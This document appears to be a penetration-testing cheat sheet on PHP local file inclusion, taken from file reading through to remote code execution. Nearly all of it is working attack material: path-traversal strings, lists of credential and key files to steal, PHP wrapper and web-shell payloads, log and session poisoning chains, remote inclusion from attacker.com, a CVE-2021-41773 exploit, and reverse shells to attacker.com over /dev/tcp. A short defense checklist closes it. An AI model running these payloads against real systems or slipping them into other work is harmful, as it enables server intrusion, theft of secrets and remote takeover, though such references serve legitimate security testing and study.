Scope: LFI from file read through full RCE. Includes PHP-specific techniques, filter bypass, and log/session poisoning chains.

Basic Path Traversal

../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd

URL Encoded

..%2fetc%2fpasswd
..%2F..%2Fetc%2Fpasswd
%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/etc/passwd
..%252fetc%252fpasswd          (double URL encode)
..%c0%afetc%c0%afpasswd        (unicode overlong encoding)
..%c1%9cetc%c1%9cpasswd

Null Byte (PHP < 5.3.4)

../../../etc/passwd%00
../../../etc/passwd%00.jpg
../../../etc/passwd\0

Filter Bypass Tricks

....//....//....//etc/passwd         (double dot-slash)
....\/....\/....\/etc/passwd
....//..//..//etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd
..././..././..././etc/passwd
/var/www/../../etc/passwd            (absolute path traversal)
php://filter/convert.base64-encode/resource=../../etc/passwd

Linux Target Files

System

/etc/passwd
/etc/shadow                          (requires root)
/etc/group
/etc/hosts
/etc/hostname
/etc/resolv.conf
/etc/issue
/etc/motd
/etc/crontab
/etc/cron.d/
/etc/cron.daily/
/etc/os-release
/proc/version
/proc/cmdline
/proc/mounts
/proc/partitions
/proc/meminfo
/proc/cpuinfo
/proc/net/tcp
/proc/net/udp
/proc/net/fib_trie

Process Information (via /proc/self)

/proc/self/environ               ← environment variables (may include secrets)
/proc/self/cmdline               ← current process command line
/proc/self/maps                  ← memory map (find loaded libs/paths)
/proc/self/fd/                   ← open file descriptors
/proc/self/fd/0                  ← stdin
/proc/self/fd/1                  ← stdout
/proc/self/fd/2                  ← stderr
/proc/self/cwd                   ← symlink to current working directory
/proc/self/exe                   ← symlink to running executable
/proc/self/status                ← process info
/proc/self/net/arp               ← ARP table (LAN discovery)
/proc/net/route                  ← routing table

Web Application Files

/var/www/html/index.php
/var/www/html/config.php
/var/www/html/wp-config.php          (WordPress)
/var/www/html/.env                   (Laravel / Node)
/var/www/html/sites/default/settings.php  (Drupal)
/var/www/html/application/config/database.php  (CodeIgniter)
/etc/apache2/apache2.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default
/usr/local/apache2/conf/httpd.conf
/usr/local/etc/nginx/nginx.conf

SSH & Credentials

/root/.ssh/id_rsa
/root/.ssh/id_ed25519
/root/.ssh/authorized_keys
/home/user/.ssh/id_rsa
/home/user/.bash_history
/home/user/.bashrc
/home/user/.profile
/root/.bash_history

Logs (for Log Poisoning)

/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log          (RHEL/CentOS)
/var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/auth.log
/var/log/mail.log
/var/mail/root
/var/spool/mail/root

Windows Target Files

C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\drivers\etc\networks
C:\Windows\repair\sam
C:\Windows\repair\system
C:\Windows\repair\software
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY
C:\Windows\System32\config\DEFAULT
C:\Windows\System32\config\SOFTWARE
C:\boot.ini
C:\inetpub\wwwroot\web.config
C:\inetpub\wwwroot\global.asa
C:\inetpub\logs\LogFiles\W3SVC1\
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\system32\sysprep\sysprep.xml
C:\sysprep\sysprep.xml
C:\sysprep.inf
C:\Users\Administrator\.ssh\id_rsa
C:\Users\<username>\AppData\Roaming\FileZilla\sitemanager.xml
C:\ProgramData\FileZilla Server\FileZilla Server.xml

PHP Wrappers

php://filter (Read source code)

php://filter/read=convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=../../config.php
php://filter/convert.base64-encode/resource=/var/www/html/config.php
php://filter/read=string.rot13/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=index.php

# Chain filters
php://filter/read=convert.iconv.utf-8.utf-16/convert.base64-encode/resource=index.php

php://input (RCE — POST body executed as PHP)

GET /index.php?page=php://input HTTP/1.1
...
<?php system('id'); ?>

# URL: ?file=php://input
# POST body: <?php system($_GET['cmd']); ?>

data:// (RCE — inline PHP)

?file=data://text/plain,<?php system('id');?>
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOz8+

phar:// (Deserialization)

?file=phar:///var/www/html/uploads/malicious.jpg/poc.txt
# Requires controlling a file that contains a PHAR archive

zip:// (Read within ZIP)

?file=zip:///var/www/html/uploads/shell.zip%23shell.php
# If file upload → ZIP upload → LFI via zip://

expect:// (RCE — if expect module enabled)

?file=expect://id
?file=expect://whoami
?file=expect://curl+http://attacker.com/shell.sh|bash

LFI to RCE Chains

Log Poisoning — Apache/Nginx Access Log

# Step 1: Inject PHP into User-Agent
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/

# Step 2: Include the log
http://target.com/index.php?file=../../../../var/log/apache2/access.log&cmd=id

Log Poisoning — SSH Auth Log

# Step 1: Attempt SSH with PHP as username
ssh '<?php system($_GET["cmd"]); ?>'@target.com

# Step 2: Include auth log
http://target.com/index.php?file=../../../../var/log/auth.log&cmd=id

/proc/self/environ Poisoning

# Step 1: Inject PHP into HTTP header
GET / HTTP/1.1
User-Agent: <?php system('id'); ?>

# Step 2: Include environ
http://target.com/?file=../../../../proc/self/environ

Session File Poisoning

# Step 1: Create session with PHP in a parameter
# Visit: http://target.com/index.php?name=<?php system($_GET['cmd']); ?>
# Session stored in: /var/lib/php/sessions/sess_SESSIONID
#                 or: /tmp/sess_SESSIONID

# Step 2: Include session file
http://target.com/index.php?file=../../tmp/sess_PHPSESSID&cmd=id

PHP Session Upload Progress

# PHP 5.4+ — session.upload_progress.enabled = On
# Make POST with file upload AND PHP code in upload progress name

POST /index.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----

------
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

<?php system('id'); ?>
------
Content-Disposition: form-data; name="file"; filename="test.txt"

test
------

Via phpinfo() + LFI Race

# phpinfo() shows tmp file path for uploaded files
# Race: include tmp file before PHP deletes it
# Tools: lfi-race-condition exploit scripts

Remote File Inclusion (RFI)

Requires allow_url_include = On (rarely enabled in modern PHP):

?file=http://attacker.com/shell.php
?file=https://attacker.com/shell.php
?file=ftp://attacker.com/shell.php
?file=\\attacker.com\share\shell.php     (Windows UNC)
?file=//attacker.com/shell.php

Wfuzz / Fuzzing Wordlists

# Path traversal sequences
wfuzz -w /usr/share/wfuzz/wordlist/Injections/Traversal.txt -u "http://target.com/?file=FUZZ"

# Common files
wfuzz -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u "http://target.com/?file=FUZZ"

Real-World Examples

Example: CVE-2021-41773 — Apache Path Traversal + RCE

# Path traversal to /etc/passwd
curl -s --path-as-is "http://target.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd"

# RCE via mod_cgi (if enabled)
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; id" \
  "http://target.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

# Reverse shell
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/attacker.com/4444 0>&1" \
  "http://target.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

Example: Log Poisoning → RCE (PHP App)

# Step 1: Inject PHP payload into User-Agent (written to access log)
curl -s http://target.com/ -A '<?php system($_GET["cmd"]); ?>'

# Step 2: Include the log via LFI
curl "http://target.com/index.php?page=../../../../var/log/apache2/access.log&cmd=id"
# Output: uid=33(www-data)

# Step 3: Reverse shell
curl "http://target.com/index.php?page=../../../../var/log/apache2/access.log&cmd=bash+-c+'bash+-i+>%26+/dev/tcp/attacker.com/4444+0>%261'"

Example: php://filter — Read Source Code

# Read wp-config.php without executing it
curl "http://target.com/?file=php://filter/convert.base64-encode/resource=wp-config.php" \
  | grep -o '[A-Za-z0-9+/=]\{100,\}' | base64 -d

# Output: DB_PASSWORD, AUTH_KEY, etc.

Example: HTB: Beep — LFI to Log Poisoning

# LFI found in /vtigercrm/index.php?module=...&action=...
# Step 1: Poison the mail log via SMTP
nc target.htb 25
EHLO hacker
MAIL FROM: <<?php system('id'); ?>>

# Step 2: Include mail log
curl "http://target.htb/vtigercrm/index.php?module=../../../../var/log/mail"
# Output: uid=0(root) — Asterisk runs as root!

Tools

# LFISuite
python lfisuite.py

# kadimus
./kadimus -u "http://target.com/?page=FUZZ"

# fimap
python fimap.py -u "http://target.com/?page=test"

# liffy
python liffy.py -u "http://target.com/?file=test"

Defense Checklist

• Never pass user input directly to file inclusion functions (include(), require(), file_get_contents())
• Use a whitelist of allowed filenames/paths
• Disable allow_url_include and allow_url_fopen
• Set open_basedir to restrict PHP file access
• Run web server as low-privilege user
• Disable PHP wrappers if not needed

References

• PortSwigger Path Traversal Labs
• PayloadsAllTheThings LFI
• HackTricks LFI2RCE